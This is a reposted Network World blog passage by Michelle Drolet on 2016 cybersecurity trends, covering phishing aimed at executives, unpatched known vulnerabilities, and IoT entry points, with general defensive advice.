    Cybercriminals follow the path of least resistance and the easiest way for them to gain access to your precious data is usually by tricking a person into handing over the keys, not by writing a clever piece of code. Phishing attacks are growing more sophisticated all the time, as official-looking messages and websites, or communications that apparently come from trusted sources, are employed to gain access to your systems.

    The targeting of high-level execs or anyone with a high security clearance is on the rise. If cybercriminals can hack a CEO’s account, for example, they can use it to wreak havoc and expose a lot of sensitive data. Educating potential targets about the dangers is not enough. You need a combination of real-time monitoring and scanning systems, with protective blocking capabilities. That said, sometimes laying down a security policy for employee education is all you need.

    Known vulnerabilities

    The open source movement has leveled the playing field for many companies, and there are also lots of off-the-shelf software packages that are very popular. Integrating this software will often make more business sense than developing something in-house, but you have to keep vulnerabilities in mind. Publicly known vulnerabilities are one of the biggest threats for IT departments.

    Consider that HP’s 2015 Cyber Risk Report found that 44% of 2014 breaches came from vulnerabilities that are two to four years old, and you can see the problem. Software must be patched regularly, and expertise is required to avoid common misconfigurations that offer attackers an easy way in.

    The Internet of Things

    We’ve seen a wave of mobile devices and wearables stream into the workplace, each offering a new potential inroad for a cybercriminal, but the Internet of Things represents another looming threat. As connectivity spreads into every corner of our lives and businesses, it becomes more and more challenging to maintain a clear view of entry points and data flow.

    The IoT may herald some exciting business opportunities, but we must be mindful about ensuring that access is limited and secure. Sensitive data should be encrypted, access must be restricted, and oversight is needed. It’s important to be able to manage and block access to enterprise devices and networks when necessary.

    If you expect to enjoy success in 2016, and you want to ensure that your plans aren’t derailed, then make sure that these cybersecurity trends are on your radar.

    The opinions expressed in this Blog are those of Michelle Drolet and do not necessarily represent those of the IDG Communications, Inc., its parent, subsidiary or affiliated companies.

    Source: http://www.networkworld.com/article/3019235/security/5-cybersecurity-trends-to-watch-for-2016.html

  • http://www.itgovernance.co.uk/what-is-cybersecurity.aspx
  • Posted by: Edna Mae Buniel